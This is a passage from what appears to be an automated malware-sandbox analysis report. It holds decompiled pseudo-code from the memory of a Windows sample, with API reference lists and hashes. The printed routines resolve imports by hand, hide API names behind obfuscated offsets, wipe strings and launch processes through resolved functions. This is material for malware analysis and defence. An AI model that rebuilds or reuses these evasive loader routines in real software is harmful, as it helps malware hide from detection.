                                                                                                                                                                                                    						_t18 = _t75 + 0x4f6eb28; // 0x530025
                                                                                                                                                                                                    						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                                                                                                                                    						_t56 =  *_t85(_v8);
                                                                                                                                                                                                    						_a8 = _t56;
                                                                                                                                                                                                    						_t57 =  *_t85(_a4);
                                                                                                                                                                                                    						_t58 = lstrlenW(_a12);
                                                                                                                                                                                                    						_t88 = E04F68D59(lstrlenW(0x4f6ec48) + _a8 + _t57 + _t58 + lstrlenW(0x4f6ec48) + _a8 + _t57 + _t58 + 2);
                                                                                                                                                                                                    						if(_t88 == 0) {
                                                                                                                                                                                                    							E04F6677C(_v16);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							_t31 = _t64 + 0x4f6ec48; // 0x73006d
                                                                                                                                                                                                    							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                                                                                                                                                                                    							 *_a16 = _v16;
                                                                                                                                                                                                    							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                    							 *_a20 = _t88;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F6677C(_v8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                    			}


























                                                                                                                                                                                                    0x04f615ee
                                                                                                                                                                                                    0x04f615f6
                                                                                                                                                                                                    0x04f615fc
                                                                                                                                                                                                    0x04f6160c
                                                                                                                                                                                                    0x04f6160f
                                                                                                                                                                                                    0x04f61614
                                                                                                                                                                                                    0x04f61619
                                                                                                                                                                                                    0x04f6161b
                                                                                                                                                                                                    0x04f6161b
                                                                                                                                                                                                    0x04f61624
                                                                                                                                                                                                    0x04f61629
                                                                                                                                                                                                    0x04f6162e
                                                                                                                                                                                                    0x04f61634
                                                                                                                                                                                                    0x04f6163e
                                                                                                                                                                                                    0x04f61647
                                                                                                                                                                                                    0x04f6164e
                                                                                                                                                                                                    0x04f6165c
                                                                                                                                                                                                    0x04f6166e
                                                                                                                                                                                                    0x04f61673
                                                                                                                                                                                                    0x04f61678
                                                                                                                                                                                                    0x04f61681
                                                                                                                                                                                                    0x04f6168a
                                                                                                                                                                                                    0x04f61693
                                                                                                                                                                                                    0x04f616a1
                                                                                                                                                                                                    0x04f616a9
                                                                                                                                                                                                    0x04f616ae
                                                                                                                                                                                                    0x04f616b1
                                                                                                                                                                                                    0x04f616bc
                                                                                                                                                                                                    0x04f616d3
                                                                                                                                                                                                    0x04f616d7
                                                                                                                                                                                                    0x04f6170a
                                                                                                                                                                                                    0x04f616d9
                                                                                                                                                                                                    0x04f616dc
                                                                                                                                                                                                    0x04f616e4
                                                                                                                                                                                                    0x04f616ef
                                                                                                                                                                                                    0x04f616f7
                                                                                                                                                                                                    0x04f616ff
                                                                                                                                                                                                    0x04f61703
                                                                                                                                                                                                    0x04f61703
                                                                                                                                                                                                    0x04f616d7
                                                                                                                                                                                                    0x04f61712
                                                                                                                                                                                                    0x04f61717
                                                                                                                                                                                                    0x04f6171e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F61603
                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,80000002), ref: 04F6163E
                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 04F61647
                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 04F6164E
                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000002), ref: 04F6165C
                                                                                                                                                                                                    • lstrlenW.KERNEL32(04F6EB28), ref: 04F61665
                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 04F616A9
                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 04F616B1
                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 04F616BC
                                                                                                                                                                                                    • lstrlenW.KERNEL32(04F6EC48), ref: 04F616C5
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                    • Opcode ID: 1967acb7fdc502a7e27795f6221e9ccd5ffbff78b94f7ab9d5e92d78328ba442
                                                                                                                                                                                                    • Instruction ID: 095abc88fd29602c7a3ea119a0f25718753fa31ea5badb787f7ad3302795b90e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1967acb7fdc502a7e27795f6221e9ccd5ffbff78b94f7ab9d5e92d78328ba442
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E431447690020AFBDF01AFA4DC4499EBFB9EF48348B054055E919A7220DB35EA16DF90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E004010DC(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed short _v12;
                                                                                                                                                                                                    				struct HINSTANCE__* _v16;
                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v24;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                    				struct HINSTANCE__* _t37;
                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                    				CHAR* _t44;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t45;
                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    				signed short _t54;
                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                    				signed short _t59;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				CHAR* _t62;
                                                                                                                                                                                                    				signed short* _t64;
                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                    				signed short _t72;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                    				_t52 = _a4;
                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                    					L28:
                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t57 = _t34 + _t52;
                                                                                                                                                                                                    				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                                                                                    				_a4 = _t57;
                                                                                                                                                                                                    				if(_t36 == 0) {
                                                                                                                                                                                                    					L27:
                                                                                                                                                                                                    					goto L28;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t62 = _t36 + _t52;
                                                                                                                                                                                                    					_t37 = LoadLibraryA(_t62);
                                                                                                                                                                                                    					_v16 = _t37;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                                                                                    					_t53 =  *_t57;
                                                                                                                                                                                                    					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                                                                                    					_t65 = _t65 + 0xc;
                                                                                                                                                                                                    					if(_t53 != 0) {
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t64 = _t53 + _t52;
                                                                                                                                                                                                    						_t54 =  *_t64;
                                                                                                                                                                                                    						if(_t54 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                                                                                    							_t57 = _t57 + 0x14;
                                                                                                                                                                                                    							_a4 = _t57;
                                                                                                                                                                                                    							if(_t36 != 0) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v20 = _t40 - _t64 + _t52;
                                                                                                                                                                                                    						_t72 = _t54;
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						if(_t72 < 0) {
                                                                                                                                                                                                    							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                                                                                    								_t59 = 0;
                                                                                                                                                                                                    								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t59 = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t59 = _t54 + _t52;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = _t59 + 2; // 0x2
                                                                                                                                                                                                    						_t44 = _t20;
                                                                                                                                                                                                    						if(_t59 == 0) {
                                                                                                                                                                                                    							_t44 = _v12 & 0x0000ffff;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t45 = GetProcAddress(_v16, _t44);
                                                                                                                                                                                                    						_v24 = _t45;
                                                                                                                                                                                                    						if(_t45 == 0) {
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							_t60 = _t59 + 2;
                                                                                                                                                                                                    							memset(_t60, 0, lstrlenA(_t60));
                                                                                                                                                                                                    							_t65 = _t65 + 0xc;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *(_v20 + _t64) = _v24;
                                                                                                                                                                                                    						_t64 =  &(_t64[2]);
                                                                                                                                                                                                    						_t54 =  *_t64;
                                                                                                                                                                                                    						if(_t54 != 0) {
                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							L22:
                                                                                                                                                                                                    							_t57 = _a4;
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                    						_v8 = 0x7f;
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t53 = _t40;
                                                                                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_v8 = 0x7e;
                                                                                                                                                                                                    				goto L26;
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    0x004010e5
                                                                                                                                                                                                    0x004010eb
                                                                                                                                                                                                    0x004010f0
                                                                                                                                                                                                    0x004010f5
                                                                                                                                                                                                    0x004011f6
                                                                                                                                                                                                    0x004011fb
                                                                                                                                                                                                    0x004011fb
                                                                                                                                                                                                    0x004010fc
                                                                                                                                                                                                    0x004010ff
                                                                                                                                                                                                    0x00401102
                                                                                                                                                                                                    0x00401107
                                                                                                                                                                                                    0x004011f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011f5
                                                                                                                                                                                                    0x0040110e
                                                                                                                                                                                                    0x0040110e
                                                                                                                                                                                                    0x00401112
                                                                                                                                                                                                    0x00401118
                                                                                                                                                                                                    0x0040111d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401123
                                                                                                                                                                                                    0x00401132
                                                                                                                                                                                                    0x00401137
                                                                                                                                                                                                    0x00401139
                                                                                                                                                                                                    0x0040113c
                                                                                                                                                                                                    0x00401141
                                                                                                                                                                                                    0x0040114d
                                                                                                                                                                                                    0x0040114d
                                                                                                                                                                                                    0x00401150
                                                                                                                                                                                                    0x00401154
                                                                                                                                                                                                    0x004011da
                                                                                                                                                                                                    0x004011da
                                                                                                                                                                                                    0x004011dd
                                                                                                                                                                                                    0x004011e0
                                                                                                                                                                                                    0x004011e5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011f4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011f4
                                                                                                                                                                                                    0x0040115e
                                                                                                                                                                                                    0x00401161
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401163
                                                                                                                                                                                                    0x00401163
                                                                                                                                                                                                    0x0040116c
                                                                                                                                                                                                    0x00401181
                                                                                                                                                                                                    0x00401183
                                                                                                                                                                                                    0x0040117a
                                                                                                                                                                                                    0x0040117a
                                                                                                                                                                                                    0x0040117a
                                                                                                                                                                                                    0x00401165
                                                                                                                                                                                                    0x00401165
                                                                                                                                                                                                    0x00401165
                                                                                                                                                                                                    0x00401186
                                                                                                                                                                                                    0x00401186
                                                                                                                                                                                                    0x0040118b
                                                                                                                                                                                                    0x0040118d
                                                                                                                                                                                                    0x0040118d
                                                                                                                                                                                                    0x00401195
                                                                                                                                                                                                    0x0040119b
                                                                                                                                                                                                    0x004011a0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011a4
                                                                                                                                                                                                    0x004011a6
                                                                                                                                                                                                    0x004011b4
                                                                                                                                                                                                    0x004011b9
                                                                                                                                                                                                    0x004011b9
                                                                                                                                                                                                    0x004011c2
                                                                                                                                                                                                    0x004011c5
                                                                                                                                                                                                    0x004011c8
                                                                                                                                                                                                    0x004011cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011ce
                                                                                                                                                                                                    0x004011d7
                                                                                                                                                                                                    0x004011d7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011d7
                                                                                                                                                                                                    0x004011d0
                                                                                                                                                                                                    0x004011d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004011d0
                                                                                                                                                                                                    0x00401143
                                                                                                                                                                                                    0x00401147
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401147
                                                                                                                                                                                                    0x004011ed
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 00401112
                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401128
                                                                                                                                                                                                    • memset.NTDLL ref: 00401132
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000002), ref: 00401195
                                                                                                                                                                                                    • lstrlenA.KERNEL32(-00000002), ref: 004011AA
                                                                                                                                                                                                    • memset.NTDLL ref: 004011B4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                    • API String ID: 1986585659-1707062198
                                                                                                                                                                                                    • Opcode ID: 2b5cb6fd41005e992bc50bb257983e3c774c0be287a6ca3d272613f9d5c07f00
                                                                                                                                                                                                    • Instruction ID: 9a94ebcb8a07bbc1478cfc19c24b7374354cf530484877e7b63337e442b44bf6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b5cb6fd41005e992bc50bb257983e3c774c0be287a6ca3d272613f9d5c07f00
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7316575A01116ABDB18CF55DD80AAAB7B4AF48345F10407EEE05FF3A0D738EA45C758
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                    			E04F68D99(void* __eax, void* __ecx) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				long _v32;
                                                                                                                                                                                                    				void _v104;
                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                    				_t67 =  *_t1;
                                                                                                                                                                                                    				_t36 = E04F6933F(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                                                                                                                                                                                    				_v8 = _t36;
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                                                                                                                                                                                    				_t39 = _v12(_v12);
                                                                                                                                                                                                    				_v8 = _t39;
                                                                                                                                                                                                    				if(_t39 == 0 && ( *0x4f6d260 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                    					_v108 = 0;
                                                                                                                                                                                                    					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                    					_t46 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t18 = _t46 + 0x4f6e3e6; // 0x73797325
                                                                                                                                                                                                    					_t66 = E04F627B6(_t18);
                                                                                                                                                                                                    					if(_t66 == 0) {
                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t49 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t19 = _t49 + 0x4f6e747; // 0x5928cef
                                                                                                                                                                                                    						_t20 = _t49 + 0x4f6e0af; // 0x4e52454b
                                                                                                                                                                                                    						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                    						if(_t69 == 0) {
                                                                                                                                                                                                    							_v8 = 0x7f;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_v108 = 0x44;
                                                                                                                                                                                                    							E04F694FB();
                                                                                                                                                                                                    							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                    							E04F694FB();
                                                                                                                                                                                                    							if(_t57 == 0) {
                                                                                                                                                                                                    								_v8 = GetLastError();
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								CloseHandle(_v32);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, 0, _t66);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t68 = _v16;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                                                                                                                                                                                    				E04F6677C(_t68);
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x04f68da1
                                                                                                                                                                                                    0x04f68da1
                                                                                                                                                                                                    0x04f68db0
                                                                                                                                                                                                    0x04f68db7
                                                                                                                                                                                                    0x04f68dbc
                                                                                                                                                                                                    0x04f68ecc
                                                                                                                                                                                                    0x04f68ed3
                                                                                                                                                                                                    0x04f68ed3
                                                                                                                                                                                                    0x04f68dcb
                                                                                                                                                                                                    0x04f68dd6
                                                                                                                                                                                                    0x04f68dd9
                                                                                                                                                                                                    0x04f68dde
                                                                                                                                                                                                    0x04f68df3
                                                                                                                                                                                                    0x04f68df9
                                                                                                                                                                                                    0x04f68dfa
                                                                                                                                                                                                    0x04f68dfd
                                                                                                                                                                                                    0x04f68e03
                                                                                                                                                                                                    0x04f68e06
                                                                                                                                                                                                    0x04f68e0b
                                                                                                                                                                                                    0x04f68e13
                                                                                                                                                                                                    0x04f68e1f
                                                                                                                                                                                                    0x04f68e23
                                                                                                                                                                                                    0x04f68eb3
                                                                                                                                                                                                    0x04f68e29
                                                                                                                                                                                                    0x04f68e29
                                                                                                                                                                                                    0x04f68e2e
                                                                                                                                                                                                    0x04f68e35
                                                                                                                                                                                                    0x04f68e49
                                                                                                                                                                                                    0x04f68e4d
                                                                                                                                                                                                    0x04f68e9c
                                                                                                                                                                                                    0x04f68e4f
                                                                                                                                                                                                    0x04f68e50
                                                                                                                                                                                                    0x04f68e57
                                                                                                                                                                                                    0x04f68e70
                                                                                                                                                                                                    0x04f68e72
                                                                                                                                                                                                    0x04f68e76
                                                                                                                                                                                                    0x04f68e7d
                                                                                                                                                                                                    0x04f68e97
                                                                                                                                                                                                    0x04f68e7f
                                                                                                                                                                                                    0x04f68e88
                                                                                                                                                                                                    0x04f68e8d
                                                                                                                                                                                                    0x04f68e8d
                                                                                                                                                                                                    0x04f68e7d
                                                                                                                                                                                                    0x04f68eab
                                                                                                                                                                                                    0x04f68eab
                                                                                                                                                                                                    0x04f68e23
                                                                                                                                                                                                    0x04f68eba
                                                                                                                                                                                                    0x04f68ec3
                                                                                                                                                                                                    0x04f68ec7
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F68DB5,?,00000001,?,?,00000000,00000000), ref: 04F69364
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F69386
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F6939C
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F693B2
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F693C8
                                                                                                                                                                                                      • Part of subcall function 04F6933F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F693DE
                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 04F68DCB
                                                                                                                                                                                                    • memset.NTDLL ref: 04F68E06
                                                                                                                                                                                                      • Part of subcall function 04F627B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F65073,63699BCE,04F652BC,73797325), ref: 04F627C7
                                                                                                                                                                                                      • Part of subcall function 04F627B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F627E1
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,05928CEF,73797325), ref: 04F68E3C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04F68E43
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F68EAB
                                                                                                                                                                                                      • Part of subcall function 04F694FB: GetProcAddress.KERNEL32(36776F57,04F6341A), ref: 04F69516
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04F68E88
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 04F68E8D
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001), ref: 04F68E91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 478747673-0
                                                                                                                                                                                                    • Opcode ID: 167a97d51b740c3e1416d20a73a0089dd2df8f77df8132610c48c43d911dc004
                                                                                                                                                                                                    • Instruction ID: 4f7c6dee7c166713aa6289255361f8a30ead01e0f796f9b384e2b45273c74be2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 167a97d51b740c3e1416d20a73a0089dd2df8f77df8132610c48c43d911dc004
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C313DB6D00209FFEB10AFE4DD88D9EBBBCEB08344F004469E656A7111D775AE45DBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                    			E04F61A30(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                    				char* _t28;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				char* _t41;
                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                    				char* _t43;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t9 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t1 = _t9 + 0x4f6e62c; // 0x253d7325
                                                                                                                                                                                                    				_t36 = 0;
                                                                                                                                                                                                    				_t28 = E04F662FC(__ecx, _t1);
                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                    					_t40 = __imp__;
                                                                                                                                                                                                    					_t13 =  *_t40(_t28);
                                                                                                                                                                                                    					_v8 = _t13;
                                                                                                                                                                                                    					_t41 = E04F68D59(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						strcpy(_t41, _t28);
                                                                                                                                                                                                    						_pop(_t33);
                                                                                                                                                                                                    						__imp__(_t41, _a4);
                                                                                                                                                                                                    						_t36 = E04F698DC(_t34, _t41, _a8);
                                                                                                                                                                                                    						E04F6677C(_t41);
                                                                                                                                                                                                    						_t42 = E04F6A79A(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                    							E04F6677C(_t36);
                                                                                                                                                                                                    							_t36 = _t42;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t43 = E04F6226B(_t36, _t33);
                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                    							E04F6677C(_t36);
                                                                                                                                                                                                    							_t36 = _t43;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F6677C(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t36;
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x04f61a30
                                                                                                                                                                                                    0x04f61a33
                                                                                                                                                                                                    0x04f61a34
                                                                                                                                                                                                    0x04f61a3c
                                                                                                                                                                                                    0x04f61a43
                                                                                                                                                                                                    0x04f61a4a
                                                                                                                                                                                                    0x04f61a4e
                                                                                                                                                                                                    0x04f61a54
                                                                                                                                                                                                    0x04f61a5b
                                                                                                                                                                                                    0x04f61a60
                                                                                                                                                                                                    0x04f61a72
                                                                                                                                                                                                    0x04f61a76
                                                                                                                                                                                                    0x04f61a7a
                                                                                                                                                                                                    0x04f61a80
                                                                                                                                                                                                    0x04f61a85
                                                                                                                                                                                                    0x04f61a95
                                                                                                                                                                                                    0x04f61a97
                                                                                                                                                                                                    0x04f61aae
                                                                                                                                                                                                    0x04f61ab2
                                                                                                                                                                                                    0x04f61ab5
                                                                                                                                                                                                    0x04f61aba
                                                                                                                                                                                                    0x04f61aba
                                                                                                                                                                                                    0x04f61ac3
                                                                                                                                                                                                    0x04f61ac7
                                                                                                                                                                                                    0x04f61aca
                                                                                                                                                                                                    0x04f61acf
                                                                                                                                                                                                    0x04f61acf
                                                                                                                                                                                                    0x04f61ac7
                                                                                                                                                                                                    0x04f61ad2
